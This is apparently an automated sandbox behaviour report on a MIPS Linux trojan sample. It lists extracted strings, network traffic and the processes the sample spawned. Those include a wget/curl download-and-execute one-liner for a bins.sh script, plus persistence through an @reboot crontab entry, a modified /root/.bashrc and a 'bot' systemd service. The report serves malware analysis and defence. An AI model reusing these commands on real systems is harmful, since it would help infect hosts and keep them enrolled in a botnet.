Source: mipsel.elf |
ReversingLabs: Detection: 34% |
Source: mipsel.elf |
String: /proc//exe/proc/%d/cwd/var/tmp/proc/%d/fd.../proc/%d/fd/%s/proc/proc/%d/statr /root/mnt/dev/cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogmipsel->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd@ |
Source: mipsel.elf |
String: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh" |
Source: mipsel.elf |
String: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrca |
Source: .bashrc.13.dr |
String: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh" |
Source: bot.service.13.dr |
String: ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh" |
Source: global traffic |
TCP traffic: 192.168.2.15:55762 -> 8.8.8.8:53 |
Source: global traffic |
TCP traffic: 192.168.2.15:55760 -> 8.8.8.8:53 |
Source: global traffic |
TCP traffic: 192.168.2.15:55752 -> 8.8.8.8:53 |
Source: global traffic |
TCP traffic: 192.168.2.15:55758 -> 8.8.8.8:53 |
Source: global traffic |
TCP traffic: 192.168.2.15:55756 -> 8.8.8.8:53 |
Source: /bin/curl (PID: 5547) |
Reads hosts file: /etc/hosts |
Jump to behavior |
Source: /tmp/mipsel.elf (PID: 5528) |
Socket: 127.0.0.1:4161 |
Jump to behavior |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
DNS traffic detected: DNS query: host.zopz-api.com |
Source: global traffic |
DNS traffic detected: DNS query: motd.ubuntu.com |
Source: global traffic |
DNS traffic detected: DNS query: daisy.ubuntu.com |
Source: tmp.kyAZ7l.23.dr |
String found in binary or memory: http://serverip/bins/bins.sh |
Source: bot.service.13.dr |
String found in binary or memory: http://serverip/bins/bins.sh; |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox |
Source: Initial sample |
String containing 'busybox' found: /proc//exe/proc/%d/cwd/var/tmp/proc/%d/fd.../proc/%d/fd/%s/proc/proc/%d/statr /root/mnt/dev/cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogmipsel->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd@ |
Source: ELF static info symbol of initial sample |
.symtab present: no |
Source: classification engine |
Classification label: mal68.troj.linELF@0/4@31/0 |
Source: /bin/sh (PID: 5544) |
Crontab executable: /usr/bin/crontab -> crontab -l |
Jump to behavior |
Source: /bin/sh (PID: 5543) |
Crontab executable: /usr/bin/crontab -> crontab - |
Jump to behavior |
Source: /tmp/mipsel.elf (PID: 5530) |
File written: /root/.bashrc |
Jump to behavior |
Source: /usr/bin/crontab (PID: 5543) |
File: /var/spool/cron/crontabs/tmp.kyAZ7l |
Jump to behavior |
Source: /usr/bin/crontab (PID: 5543) |
File: /var/spool/cron/crontabs/root |
Jump to behavior |
Source: /tmp/mipsel.elf (PID: 5530) |
File: /root/.bashrc |
Jump to behavior |
Source: /bin/curl (PID: 5547) |
Directory: /root/.curlrc |
Jump to behavior |
Source: /tmp/mipsel.elf (PID: 5540) |
Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -" |
Jump to behavior |
Source: /tmp/mipsel.elf (PID: 5551) |
Shell command executed: sh -c "/bin/systemctl enable bot" |
Jump to behavior |
Source: /bin/sh (PID: 5545) |
Chmod executable: /usr/bin/chmod -> chmod +x bins.sh |
Jump to behavior |
Source: /bin/sh (PID: 5550) |
Chmod executable: /usr/bin/chmod -> chmod +x bins.sh |
Jump to behavior |
Source: /bin/sh (PID: 5557) |
Systemctl executable: /bin/systemctl -> /bin/systemctl enable bot |
Jump to behavior |
Source: /tmp/mipsel.elf (PID: 5528) |
Queries kernel information via 'uname': |
Jump to behavior |
Source: /bin/curl (PID: 5547) |
Queries kernel information via 'uname': |
Jump to behavior |
Source: mipsel.elf, 5528.1.0000558fa359e000.0000558fa3646000.rw-.sdmp, mipsel.elf, 5530.1.0000558fa359e000.0000558fa3646000.rw-.sdmp |
Binary or memory string: /etc/qemu-binfmt/mipsel |
Source: mipsel.elf, 5528.1.00007ffcda39d000.00007ffcda3be000.rw-.sdmp, mipsel.elf, 5530.1.00007ffcda39d000.00007ffcda3be000.rw-.sdmp |
Binary or memory string: Yx86_64/usr/bin/qemu-mipsel/tmp/mipsel.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mipsel.elf |
Source: mipsel.elf, 5528.1.0000558fa359e000.0000558fa3646000.rw-.sdmp, mipsel.elf, 5530.1.0000558fa359e000.0000558fa3646000.rw-.sdmp |
Binary or memory string: U!/etc/qemu-binfmt/mipsel |
Source: mipsel.elf, 5528.1.00007ffcda39d000.00007ffcda3be000.rw-.sdmp, mipsel.elf, 5530.1.00007ffcda39d000.00007ffcda3be000.rw-.sdmp |
Binary or memory string: /usr/bin/qemu-mipsel |
Source: mipsel.elf, 5530.1.00007ffcda39d000.00007ffcda3be000.rw-.sdmp |
Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped |